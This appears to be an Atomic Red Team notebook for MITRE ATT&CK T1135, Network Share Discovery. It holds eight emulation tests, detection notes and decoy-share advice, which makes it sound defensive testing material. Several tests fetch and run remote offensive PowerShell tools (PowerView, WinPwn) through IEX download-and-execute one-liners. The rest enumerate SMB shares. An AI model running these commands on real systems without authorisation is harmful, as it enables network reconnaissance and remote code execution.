# T1135 - Network Share Discovery
Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. 

File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the <code>net view \\\\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>. For macOS, the <code>sharing -l</code> command lists all shared points used for smb services.

## Atomic Tests

### Atomic Test #1 - Network Share Discovery
Network Share Discovery

**Supported Platforms:** macos
#### Attack Commands: Run with `sh`
```sh
df -aH
smbutil view -g //computer1
showmount computer1
```

In [ ]:
Invoke-AtomicTest T1135 -TestNumbers 1

### Atomic Test #2 - Network Share Discovery - linux
Network Share Discovery using smbstatus

**Supported Platforms:** linux
Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `bash`!
##### Description: Package with smbstatus (samba) must exist on device

##### Check Prereq Commands:
```bash
if (rpm -q samba &>/dev/null) || (dpkg -s samba | grep -q installed) > /dev/null; then exit 0; else exit 1; fi

```
##### Get Prereq Commands:
```bash
sudo (which yum && yum -y install epel-release samba)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y samba) 

```

In [ ]:
Invoke-AtomicTest T1135 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `bash`
```bash
sudo smbstatus --shares
```

In [ ]:
Invoke-AtomicTest T1135 -TestNumbers 2

### Atomic Test #3 - Network Share Discovery command prompt
Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host
Upon execution avalaible network shares will be displayed in the powershell session

**Supported Platforms:** windows
#### Attack Commands: Run with `command_prompt`
```command_prompt
net view \\localhost
```

In [ ]:
Invoke-AtomicTest T1135 -TestNumbers 3

### Atomic Test #4 - Network Share Discovery PowerShell
Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host
Upon execution, avalaible network shares will be displayed in the powershell session

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
get-smbshare
```

In [ ]:
Invoke-AtomicTest T1135 -TestNumbers 4

### Atomic Test #5 - View available share drives
View information about all of the resources that are shared on the local computer Upon execution, avalaible share drives will be displayed in the powershell session
**Supported Platforms:** windows
#### Attack Commands: Run with `command_prompt`
```command_prompt
net share
```

In [ ]:
Invoke-AtomicTest T1135 -TestNumbers 5

### Atomic Test #6 - Share Discovery with PowerView
Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Endpoint must be joined to domain

##### Check Prereq Commands:
```powershell
if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
"Join system to domain"

```

In [ ]:
Invoke-AtomicTest T1135 -TestNumbers 6 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose
```

In [ ]:
Invoke-AtomicTest T1135 -TestNumbers 6

### Atomic Test #7 - PowerView ShareFinder
PowerView is a PowerShell tool to gain network situational awareness on Windows domains. ShareFinder finds (non-standard) shares on machines in the domain.
**Supported Platforms:** windows
#### Dependencies:  Run with `None`!
##### Description: Invoke-ShareFinder module must exist in %TEMP% directory
##### Check Prereq Commands:
```None
if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```None
Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1" -OutFile $env:TEMP\PowerView.ps1

```

In [ ]:
Invoke-AtomicTest T1135 -TestNumbers 7 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Import-Module $env:TEMP\PowerView.ps1
Invoke-ShareFinder -CheckShareAccess
```

In [ ]:
Invoke-AtomicTest T1135 -TestNumbers 7

### Atomic Test #8 - WinPwn - shareenumeration
Network share enumeration using the shareenumeration function of WinPwn
**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
shareenumeration -noninteractive -consoleoutput```

In [ ]:
Invoke-AtomicTest T1135 -TestNumbers 8

## Detection
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).

## Shield Active Defense
### Decoy Content  
 Seed content that can be used to lead an adversary in a specific direction, entice a behavior, etc. 

 Decoy Content is the data used to tell a story to an adversary. This content can be legitimate or synthetic data which is used to reinforce or validate your defensive strategy. Examples of decoy content are files on a storage object, entries in the system registry, system shortcuts, etc.
#### Opportunity
In an adversary engagement scenario, there is an opportunity to introduce decoy content to entice additional engagement activity.
#### Use Case
A defender can utilize decoy network shares to provide content that could be used by the adversary. 
#### Procedures
Create directories and files with names and contents using key words that may be relevant to an adversary to see if they examine or exfiltrate the data.
Seed a file system with content that is of no value to the company but reinforces the legitimacy of the system if viewed by an adversary.